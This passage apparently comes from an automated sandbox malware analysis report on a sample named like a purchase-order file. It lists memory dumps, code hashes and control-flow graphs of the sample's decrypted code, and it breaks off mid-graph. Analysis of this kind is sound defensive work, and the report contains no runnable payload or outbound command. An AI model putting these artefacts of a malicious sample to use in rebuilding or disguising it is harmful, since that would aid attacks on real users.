                                                                                                                                              • Instruction ID: ef2c7ab4257363e3a800acdac7d876b41c0df059a74759b02755501b3d9b8a8b
                                                                                                                                              • Opcode Fuzzy Hash: 76fb3b8cac70008146dad764b8dfbfc8b808d2f244a071a50930847b12544891
                                                                                                                                              • Instruction Fuzzy Hash: C212B4B0C117468AE7BACF25E94C18D3BB6BB44328B50432AD2751A2E9DBF415CBDF44
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3eb5bcdf3334c7247750ec2bea2200b26bc88ef07829fecc0191c6e2cc6ae46f
                                                                                                                                              • Instruction ID: 9e7f83aaaa585725e06c877ec0862950ce6b74af4a5a12f270a8ac4bfc20f0fd
                                                                                                                                              • Opcode Fuzzy Hash: 3eb5bcdf3334c7247750ec2bea2200b26bc88ef07829fecc0191c6e2cc6ae46f
                                                                                                                                              • Instruction Fuzzy Hash: 91E1E9B4E102198FCB14DF99C5809AEBBF2BF89305F24C159D415AB396DB71AD42CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f5fc99112dd32d085952a84427620151d6083af75dc69dd54a0dcb20ffe2a961
                                                                                                                                              • Instruction ID: 074e13a55ac0c4a5f05b8c023d8fa0c957a6cd2b11266bdda64d8ef1f79ef5d3
                                                                                                                                              • Opcode Fuzzy Hash: f5fc99112dd32d085952a84427620151d6083af75dc69dd54a0dcb20ffe2a961
                                                                                                                                              • Instruction Fuzzy Hash: 6CE1FCB4E101198FCB14DF99C5809AEFBF2BF89305F248259E415A7396DB70AD42CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9d0276570e1e32de0d5533b1a9b3d1018b4651ef68ae4b80e10c606c41bd156b
                                                                                                                                              • Instruction ID: b3c7cc1b4dec3df2b68742a7f60e41216fcc737513ee09ce45b707aa14cc63ca
                                                                                                                                              • Opcode Fuzzy Hash: 9d0276570e1e32de0d5533b1a9b3d1018b4651ef68ae4b80e10c606c41bd156b
                                                                                                                                              • Instruction Fuzzy Hash: 40E1EBB4E102198FCB14DFA9C5909ADBBF2BF89305F24C159D414AB395DB71A942CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e5bfee151f324e8f4833b0ee98e7255a0a2fb31cd57cb9d84c925ebbab97a3b3
                                                                                                                                              • Instruction ID: 43521783c51a2923da9e675f8cd4f56ad1607ddf5a305931940e8784c2fce41d
                                                                                                                                              • Opcode Fuzzy Hash: e5bfee151f324e8f4833b0ee98e7255a0a2fb31cd57cb9d84c925ebbab97a3b3
                                                                                                                                              • Instruction Fuzzy Hash: 90E1ECB4E102198FCB14DFA9C5909AEBBF2BF89305F24C169D414A7356DB71AD41CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 024498cfa72a059c0ae60245a831e994b642e823f1372e9423827cf6cc0f1152
                                                                                                                                              • Instruction ID: 82c1eaaf1681ed8507021bbe5a2d2d5ae7a772cd9ddf54c3dfda2ea19aac00ce
                                                                                                                                              • Opcode Fuzzy Hash: 024498cfa72a059c0ae60245a831e994b642e823f1372e9423827cf6cc0f1152
                                                                                                                                              • Instruction Fuzzy Hash: 62E1D9B4E102198FCB14DFA9C5909AEBBF2BF89305F24C159E414A7395DB71AD42CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3f3ca09374d1c00857c293adb750f9b625bc7656fec7fa32062ba763e66acafc
                                                                                                                                              • Instruction ID: 8bac38221ab2983daab055d5bad43a63b1aaf9cc56767eb2752b9637f7ae09d2
                                                                                                                                              • Opcode Fuzzy Hash: 3f3ca09374d1c00857c293adb750f9b625bc7656fec7fa32062ba763e66acafc
                                                                                                                                              • Instruction Fuzzy Hash: ACA1AF32E002098FDF19DFB5C8409EEB7B2FF84310B25857AE905AB265DB75E945DB80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1985bf243b03412c54602e1be579a1c71eecb8276530ee31479e4d74cbd19682
                                                                                                                                              • Instruction ID: 8d3b146747e97561428d259e531e569fb66517b8309d2b844e3adbe834f66aee
                                                                                                                                              • Opcode Fuzzy Hash: 1985bf243b03412c54602e1be579a1c71eecb8276530ee31479e4d74cbd19682
                                                                                                                                              • Instruction Fuzzy Hash: 01D118B0C007468BD7AACF25E94818D7BB6BB85318B51432AD1716B2E9DBF814CBCF44
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3d04f114ec58b5dfd598f16205b5130c2e3d6afc53f0fc1d5dfbd4eb64927e41
                                                                                                                                              • Instruction ID: b0091533c74037af9b2ebc79db2ec16227f763af5aea5de136b42119111d3e62
                                                                                                                                              • Opcode Fuzzy Hash: 3d04f114ec58b5dfd598f16205b5130c2e3d6afc53f0fc1d5dfbd4eb64927e41
                                                                                                                                              • Instruction Fuzzy Hash: 7351BE33440A1C8FD704EB2BE9476C577A4EF66214F369389C678AB2F1D6A8A042CE44
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a41cd5536282c9b1932303e51c1fab7ef166d63c6b60893e37992ab1e134e791
                                                                                                                                              • Instruction ID: c3e4a5675d28e630b88332cfd8ede1b93f7b44f862ef9b307e42699d3e59f4c4
                                                                                                                                              • Opcode Fuzzy Hash: a41cd5536282c9b1932303e51c1fab7ef166d63c6b60893e37992ab1e134e791
                                                                                                                                              • Instruction Fuzzy Hash: 7E51F6B4E18209CFCF08CF99D4545EEFBFABF8A310F159025E419A7296D7B1A941CB90

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:13.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:11
                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                              execution_graph 18752 273e018 18753 273e024 18752->18753 18757 5357b69 18753->18757 18761 5357b78 18753->18761 18754 273e1d4 18760 5357b70 18757->18760 18758 5358029 18758->18754 18759 5357d4f KiUserExceptionDispatcher 18759->18760 18760->18758 18760->18759 18764 5357b9a 18761->18764 18762 5358029 18762->18754 18763 5357d4f KiUserExceptionDispatcher 18763->18764 18764->18762 18764->18763

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 152 273c147-273c158 153 273c184 152->153 154 273c15a-273c172 152->154 155 273c186-273c18a 153->155 158 273c174-273c179 154->158 159 273c17b-273c17e 154->159 158->155 160 273c180-273c182 159->160 161 273c18b-273c199 159->161 160->153 160->154 163 273c212-273c214 161->163 164 273c19b-273c19d 161->164 165 273c216-273c219 163->165 164->165 166 273c19f-273c1a1 164->166 168 273c21a-273c2ac call 27341a0 call 2733cc0 165->168 167 273c1a3-273c1c8 166->167 166->168 169 273c1ca 167->169 170 273c1cf-273c20a 167->170 180 273c2b3-273c2d4 call 2735658 168->180 181 273c2ae 168->181 169->170 170->163 183 273c2d9-273c2e4 180->183 181->180 184 273c2e6 183->184 185 273c2eb-273c2ef 183->185 184->185 186 273c2f1-273c2f2 185->186 187 273c2f4-273c2fb 185->187 190 273c313-273c357 186->190 188 273c302-273c310 187->188 189 273c2fd 187->189 188->190 189->188 194 273c3bd-273c3d4 190->194 196 273c3d6-273c3fb 194->196 197 273c359-273c36f 194->197 204 273c413 196->204 205 273c3fd-273c412 196->205 201 273c371-273c37d 197->201 202 273c399 197->202 206 273c387-273c38d 201->206 207 273c37f-273c385 201->207 203 273c39f-273c3bc 202->203 203->194 205->204 208 273c397 206->208 207->208 208->203
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0os$Ljs$Ljs$PH^q$PH^q
                                                                                                                                              • API String ID: 0-1454975990
                                                                                                                                              • Opcode ID: 08aecd0a2a8de83cb7d655cc0addd2b76d90b916cdfb951c0066c925fce0a5a2
                                                                                                                                              • Instruction ID: afaf1fed29ea651198f65aa714d76cdaaf962682b17d12fb103492b239761176
                                                                                                                                              • Opcode Fuzzy Hash: 08aecd0a2a8de83cb7d655cc0addd2b76d90b916cdfb951c0066c925fce0a5a2
                                                                                                                                              • Instruction Fuzzy Hash: 23A1F874E00218CFDB16DFA9D884A9DBBF2BF89310F14806AE409EB366DB319841CF51

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 212 273c468-273c46d 213 273c4e6-273c4ee 212->213 214 273c46f-273c472 212->214 217 273c47b-273c498 213->217 219 273c4ef-273c57c call 27341a0 call 2733cc0 213->219 215 273c476-273c47a 214->215 216 273c474 214->216 215->217 216->215 220 273c49a 217->220 221 273c49f-273c4e4 217->221 231 273c583-273c5a4 call 2735658 219->231 232 273c57e 219->232 220->221 221->213 234 273c5a9-273c5b4 231->234 232->231 235 273c5b6 234->235 236 273c5bb-273c5bf 234->236 235->236 237 273c5c1-273c5c2 236->237 238 273c5c4-273c5cb 236->238 239 273c5e3-273c627 237->239 240 273c5d2-273c5e0 238->240 241 273c5cd 238->241 245 273c68d-273c6a4 239->245 240->239 241->240 247 273c6a6-273c6cb 245->247 248 273c629-273c63f 245->248 254 273c6e3 247->254 255 273c6cd-273c6e2 247->255 252 273c641-273c64d 248->252 253 273c669 248->253 256 273c657-273c65d 252->256 257 273c64f-273c655 252->257 258 273c66f-273c68c 253->258 255->254 259 273c667 256->259 257->259 258->245 259->258
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0os$Ljs$Ljs$PH^q$PH^q
                                                                                                                                              • API String ID: 0-1454975990
                                                                                                                                              • Opcode ID: adbb27d2db059fc2f8efd96f72b58004158b3f0720eb1562d15c3f5f80768b25
                                                                                                                                              • Instruction ID: 4b27ddfb975b132358a6027570fe05315041259e412c91d6bce4cb74cb601038
                                                                                                                                              • Opcode Fuzzy Hash: adbb27d2db059fc2f8efd96f72b58004158b3f0720eb1562d15c3f5f80768b25
                                                                                                                                              • Instruction Fuzzy Hash: 2E91D574E00218CFDB15DFAAD884A9DBBF2FF88300F14906AE419AB366DB709941CF50

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 263 2735362-2735364 264 2735366-273536a 263->264 265 27353c4-2735484 call 27341a0 call 2733cc0 263->265 266 273536e-2735376 264->266 267 273536c 264->267 283 2735486 265->283 284 273548b-27354a9 265->284 268 273537a 266->268 269 2735378-2735379 266->269 267->266 271 273537e-27353a0 268->271 272 273537c 268->272 269->268 273 27353a2 271->273 274 27353a7-27353c2 271->274 272->271 273->274 274->265 283->284 314 27354ac call 2735649 284->314 315 27354ac call 2735658 284->315 285 27354b2-27354bd 286 27354c4-27354c8 285->286 287 27354bf 285->287 288 27354ca-27354cb 286->288 289 27354cd-27354d4 286->289 287->286 290 27354ec-2735530 288->290 291 27354d6 289->291 292 27354db-27354e9 289->292 296 2735596-27355ad 290->296 291->292 292->290 298 2735532-2735548 296->298 299 27355af-27355d4 296->299 303 2735572 298->303 304 273554a-2735556 298->304 305 27355d6-27355eb 299->305 306 27355ec 299->306 309 2735578-2735595 303->309 307 2735560-2735566 304->307 308 2735558-273555e 304->308 305->306 310 2735570 307->310 308->310 309->296 310->309 314->285 315->285
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0os$Ljs$Ljs$PH^q$PH^q
                                                                                                                                              • API String ID: 0-1454975990
                                                                                                                                              • Opcode ID: 967bb517de733ac73047ff2529232c72b4c9a2e7730737c3e2523fbd0dafecf3
                                                                                                                                              • Instruction ID: c5f23beac8a5a2964e05090a9a7fe2a57d2f0aa5bfae785edc9d587f1e8fa1a0
                                                                                                                                              • Opcode Fuzzy Hash: 967bb517de733ac73047ff2529232c72b4c9a2e7730737c3e2523fbd0dafecf3
                                                                                                                                              • Instruction Fuzzy Hash: C991F374E01258CFDB19CFA9D884A9DBBF2BF89300F54C069E409AB366DB71A945CF50

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 316 273ca08-273ca0a 317 273ca0e 316->317 318 273ca0c 316->318 319 273ca12 317->319 320 273ca10 317->320 318->317 321 273ca16-273ca38 319->321 322 273ca14 319->322 320->319 325 273ca3a 321->325 326 273ca3f-273ca6c 321->326 323 273ca15 322->323 324 273ca6d-273cb1c call 27341a0 call 2733cc0 322->324 323->321 336 273cb23-273cb44 call 2735658 324->336 337 273cb1e 324->337 325->326 326->324 339 273cb49-273cb54 336->339 337->336 340 273cb56 339->340 341 273cb5b-273cb5f 339->341 340->341 342 273cb61-273cb62 341->342 343 273cb64-273cb6b 341->343 344 273cb83-273cbc7 342->344 345 273cb72-273cb80 343->345 346 273cb6d 343->346 350 273cc2d-273cc44 344->350 345->344 346->345 352 273cc46-273cc6b 350->352 353 273cbc9-273cbdf 350->353 362 273cc83 352->362 363 273cc6d-273cc82 352->363 357 273cbe1-273cbed 353->357 358 273cc09 353->358 359 273cbf7-273cbfd 357->359 360 273cbef-273cbf5 357->360 361 273cc0f-273cc2c 358->361 364 273cc07 359->364 360->364 361->350 363->362 364->361
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0os$Ljs$Ljs$PH^q$PH^q
                                                                                                                                              • API String ID: 0-1454975990
                                                                                                                                              • Opcode ID: 146ae3ca7497fcfd6851bbb22a0e11a38ff47ebbf29f9dbc18ee3a48d72a503d
                                                                                                                                              • Instruction ID: 057d345b672a372b253919d5b0d1340f6f4f43f5d69b3a32094ce9dae3915ca1
                                                                                                                                              • Opcode Fuzzy Hash: 146ae3ca7497fcfd6851bbb22a0e11a38ff47ebbf29f9dbc18ee3a48d72a503d
                                                                                                                                              • Instruction Fuzzy Hash: A681C374E01258CFEB15DFAAD984A9DBBF2BF88300F14806AE419BB365DB709941CF54

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 418 273d278-273d27a 419 273d27e 418->419 420 273d27c-273d27d 418->420 421 273d282 419->421 422 273d280 419->422 420->419 423 273d286-273d2a8 421->423 424 273d284 421->424 422->421 425 273d2aa 423->425 426 273d2af-273d38c call 27341a0 call 2733cc0 423->426 424->423 425->426 436 273d393-273d3b4 call 2735658 426->436 437 273d38e 426->437 439 273d3b9-273d3c4 436->439 437->436 440 273d3c6 439->440 441 273d3cb-273d3cf 439->441 440->441 442 273d3d1-273d3d2 441->442 443 273d3d4-273d3db 441->443 444 273d3f3-273d437 442->444 445 273d3e2-273d3f0 443->445 446 273d3dd 443->446 450 273d49d-273d4b4 444->450 445->444 446->445 452 273d4b6-273d4db 450->452 453 273d439-273d44f 450->453 460 273d4f3 452->460 461 273d4dd-273d4f2 452->461 457 273d451-273d45d 453->457 458 273d479 453->458 462 273d467-273d46d 457->462 463 273d45f-273d465 457->463 459 273d47f-273d49c 458->459 459->450 461->460 464 273d477 462->464 463->464 464->459
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0os$Ljs$Ljs$PH^q$PH^q
                                                                                                                                              • API String ID: 0-1454975990
                                                                                                                                              • Opcode ID: 38ad4a38ad6c53922ef169ddeb08b2fa5a4453a4ef05447e5bd829fe73389e79
                                                                                                                                              • Instruction ID: 3ae43b2f7f9f79fb315dde223dbd21fb0ce626e88d53a11e9574150d8297d7f0
                                                                                                                                              • Opcode Fuzzy Hash: 38ad4a38ad6c53922ef169ddeb08b2fa5a4453a4ef05447e5bd829fe73389e79
                                                                                                                                              • Instruction Fuzzy Hash: 8C81B874E01218CFDB29DFAAD954A9DBBF2BF48310F14C069E419AB365DB709941CF50

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 368 273ccd8-273ccda 369 273ccde 368->369 370 273ccdc 368->370 371 273cce2 369->371 372 273cce0 369->372 370->369 373 273cce6-273cd08 371->373 374 273cce4-273cce5 371->374 372->371 375 273cd0a 373->375 376 273cd0f-273cdec call 27341a0 call 2733cc0 373->376 374->373 375->376 386 273cdf3-273ce14 call 2735658 376->386 387 273cdee 376->387 389 273ce19-273ce24 386->389 387->386 390 273ce26 389->390 391 273ce2b-273ce2f 389->391 390->391 392 273ce31-273ce32 391->392 393 273ce34-273ce3b 391->393 394 273ce53-273ce97 392->394 395 273ce42-273ce50 393->395 396 273ce3d 393->396 400 273cefd-273cf14 394->400 395->394 396->395 402 273cf16-273cf3b 400->402 403 273ce99-273ceaf 400->403 409 273cf53 402->409 410 273cf3d-273cf52 402->410 407 273ceb1-273cebd 403->407 408 273ced9 403->408 411 273cec7-273cecd 407->411 412 273cebf-273cec5 407->412 413 273cedf-273cefc 408->413 410->409 414 273ced7 411->414 412->414 413->400 414->413
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0os$Ljs$Ljs$PH^q$PH^q
                                                                                                                                              • API String ID: 0-1454975990
                                                                                                                                              • Opcode ID: 317fd2dc2c2489c3416381b04e96faf1562fd74ecd9725d203a67d287ac5de58
                                                                                                                                              • Instruction ID: dd55030ec2c23224e4f453200f7509a35aeccf473f8e160caca36462f9dfd297
                                                                                                                                              • Opcode Fuzzy Hash: 317fd2dc2c2489c3416381b04e96faf1562fd74ecd9725d203a67d287ac5de58
                                                                                                                                              • Instruction Fuzzy Hash: A881B474E01218DFDB15DFAAD984A9DBBF2BF89300F14806AE409BB365DB705941CF50

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 468 273c738-273c768 469 273c76a 468->469 470 273c76f-273c84c call 27341a0 call 2733cc0 468->470 469->470 480 273c853-273c874 call 2735658 470->480 481 273c84e 470->481 483 273c879-273c884 480->483 481->480 484 273c886 483->484 485 273c88b-273c88f 483->485 484->485 486 273c891-273c892 485->486 487 273c894-273c89b 485->487 488 273c8b3-273c8f7 486->488 489 273c8a2-273c8b0 487->489 490 273c89d 487->490 494 273c95d-273c974 488->494 489->488 490->489 496 273c976-273c99b 494->496 497 273c8f9-273c90f 494->497 503 273c9b3 496->503 504 273c99d-273c9b2 496->504 501 273c911-273c91d 497->501 502 273c939 497->502 505 273c927-273c92d 501->505 506 273c91f-273c925 501->506 507 273c93f-273c95c 502->507 504->503 508 273c937 505->508 506->508 507->494 508->507
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0os$Ljs$Ljs$PH^q$PH^q
                                                                                                                                              • API String ID: 0-1454975990
                                                                                                                                              • Opcode ID: f1264911ba129cc074198e990697301b29b51eccc09ae098295f7bae11571527
                                                                                                                                              • Instruction ID: 354b7839ee1d33134c8318997c074d33eab9a850965a8684c56fecf2ab841d99
                                                                                                                                              • Opcode Fuzzy Hash: f1264911ba129cc074198e990697301b29b51eccc09ae098295f7bae11571527
                                                                                                                                              • Instruction Fuzzy Hash: DA81A074E00218DFDB15DFAAD984A9DBBF2BF88300F15C06AE419AB365DB709941CF50

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 512 273cfab-273cfd8 513 273cfda 512->513 514 273cfdf-273d0bc call 27341a0 call 2733cc0 512->514 513->514 524 273d0c3-273d0e4 call 2735658 514->524 525 273d0be 514->525 527 273d0e9-273d0f4 524->527 525->524 528 273d0f6 527->528 529 273d0fb-273d0ff 527->529 528->529 530 273d101-273d102 529->530 531 273d104-273d10b 529->531 532 273d123-273d167 530->532 533 273d112-273d120 531->533 534 273d10d 531->534 538 273d1cd-273d1e4 532->538 533->532 534->533 540 273d1e6-273d20b 538->540 541 273d169-273d17f 538->541 547 273d223 540->547 548 273d20d-273d222 540->548 545 273d181-273d18d 541->545 546 273d1a9 541->546 549 273d197-273d19d 545->549 550 273d18f-273d195 545->550 551 273d1af-273d1cc 546->551 548->547 552 273d1a7 549->552 550->552 551->538 552->551
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0os$Ljs$Ljs$PH^q$PH^q
                                                                                                                                              • API String ID: 0-1454975990
                                                                                                                                              • Opcode ID: 7525a0f8cc4ca152a1eb009ad8b934acc412dbedbec7585886c83b5f23b95536
                                                                                                                                              • Instruction ID: 2459b3a3b99168abb61d27749ae5ad8da6292741bbaf1fc88f84321631cdc38b
                                                                                                                                              • Opcode Fuzzy Hash: 7525a0f8cc4ca152a1eb009ad8b934acc412dbedbec7585886c83b5f23b95536
                                                                                                                                              • Instruction Fuzzy Hash: 9A81C374E01218CFDB15DFAAD994A9DBBF2BF88300F15D069E409AB365DB709981CF50

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 556 2736fc8-2736ffe 700 2737000 call 27369a0 556->700 701 2737000 call 2737118 556->701 702 2737000 call 2736fc8 556->702 558 2737006-273700c 559 273700e-2737012 558->559 560 273705c-2737060 558->560 563 2737021-2737028 559->563 564 2737014-2737019 559->564 561 2737062-2737071 560->561 562 2737077-273708b 560->562 567 2737073-2737075 561->567 568 273709d-27370a7 561->568 569 2737093-273709a 562->569 697 273708d call 2739dd0 562->697 698 273708d call 273a0e8 562->698 699 273708d call 273a088 562->699 565 27370fe-273713b 563->565 566 273702e-2737035 563->566 564->563 578 2737146-2737166 565->578 579 273713d-2737143 565->579 566->560 572 2737037-273703b 566->572 567->569 570 27370b1-27370b5 568->570 571 27370a9-27370af 568->571 574 27370bd-27370f7 570->574 575 27370b7 570->575 571->574 576 273704a-2737051 572->576 577 273703d-2737042 572->577 574->565 575->574 576->565 580 2737057-273705a 576->580 577->576 585 2737168 578->585 586 273716d-2737174 578->586 579->578 580->569 589 27374fc-2737505 585->589 588 2737176-2737181 586->588 590 2737187-273719a 588->590 591 273750d-2737519 588->591 596 27371b0-27371cb 590->596 597 273719c-27371aa 590->597 598 273751b-2737521 591->598 599 273758e-2737594 591->599 609 27371ef-27371f2 596->609 610 27371cd-27371d3 596->610 597->596 606 2737484-273748b 597->606 600 2737523-273753a 598->600 601 2737596-27375ab 598->601 599->601 600->599 607 27375e4 601->607 608 27375ad-27375b3 601->608 606->589 615 273748d-273748f 606->615 618 27375e9-27375eb 607->618 611 27375b7-27375c3 608->611 612 27375b5 608->612 616 27371f8-27371fb 609->616 617 273734c-2737352 609->617 613 27371d5 610->613 614 27371dc-27371df 610->614 619 27375c5-27375de 611->619 612->619 613->614 613->617 620 2737212-2737218 613->620 621 273743e-2737441 613->621 614->620 622 27371e1-27371e4 614->622 623 2737491-2737496 615->623 624 273749e-27374a4 615->624 616->617 626 2737201-2737207 616->626 617->621 625 2737358-273735d 617->625 619->607 657 27375e0-27375e2 619->657 632 273721a-273721c 620->632 633 273721e-2737220 620->633 634 2737447-273744d 621->634 635 2737508 621->635 627 27371ea 622->627 628 273727e-2737284 622->628 623->624 624->591 630 27374a6-27374ab 624->630 625->621 626->617 631 273720d 626->631 627->621 628->621 639 273728a-2737290 628->639 637 